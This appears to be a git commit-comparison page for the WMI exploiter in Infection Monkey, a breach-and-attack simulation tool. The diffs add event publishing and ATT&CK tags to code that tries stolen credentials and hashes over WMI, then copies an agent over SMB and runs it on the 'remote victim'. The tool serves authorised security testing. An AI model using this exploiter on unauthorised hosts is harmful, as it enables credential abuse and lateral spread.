Compare commits

...

4 Commits

Author SHA1 Message Date
Ilija Lazoroski d1427117c7 Agent: Add successful exploitation in WMI 2022-10-07 14:58:32 +02:00
Ilija Lazoroski 6950dcdf0c Agent: Change propagation timestamp in WMI 2022-10-07 14:49:49 +02:00
Ilija Lazoroski c09c2c2127 Agent: Add attack technique tags from WMIExploiter 2022-10-07 14:12:52 +02:00
Ilija Lazoroski ed191bcf61 Agent: Publish events from WMI 2022-10-07 13:55:49 +02:00
1 changed files with 32 additions and 15 deletions

View File

@ -2,10 +2,16 @@ import logging
import ntpath
import socket
import traceback
from time import time
from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.credentials import get_plaintext
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.smb_tools import SmbTools
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
WMI_EXPLOITER_TAG = "wmi-exploiter"
class WmiExploiter(HostExploiter):
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
@WmiTools.impacket_user
@WmiTools.dcom_wrap
def _exploit_host(self) -> ExploiterResultData:
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
wmi_connection = WmiTools.WmiConnection()
timestamp = time()
try:
wmi_connection.connect(
self.host,
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
)
except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI")
error_message = f"Failed connecting to {self.host} using WMI"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue
except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI")
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue
except socket.error:
logger.debug(f"Network error in WMI connection to {self.host}")
error_message = f"Network error in WMI connection to {self.host}"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result
except Exception as exc:
logger.debug(
error_message = (
f"Unknown WMI connection error to {self.host}: "
f"{exc} {traceback.format_exc()}"
)
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True, error_message=error_message)
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
target_path = get_agent_dst_path(self.host)
propagation_timestamp = time()
remote_full_path = SmbTools.copy_file(
self.host,
downloaded_agent,
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
if (0 != result.ProcessId) and (not result.ReturnValue):
logger.info(
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,
cmdline,
f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
f"(pid={result.ProcessId}, cmdline={cmdline})"
)
self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True
self._publish_propagation_event(propagation_timestamp, True)
else:
error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,
result.ReturnValue,
cmdline,
f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
)
logger.debug(error_message)
self.exploit_result.error_message = error_message
self._publish_propagation_event(
propagation_timestamp, False, error_message=error_message
)
result.RemRelease()
wmi_connection.close()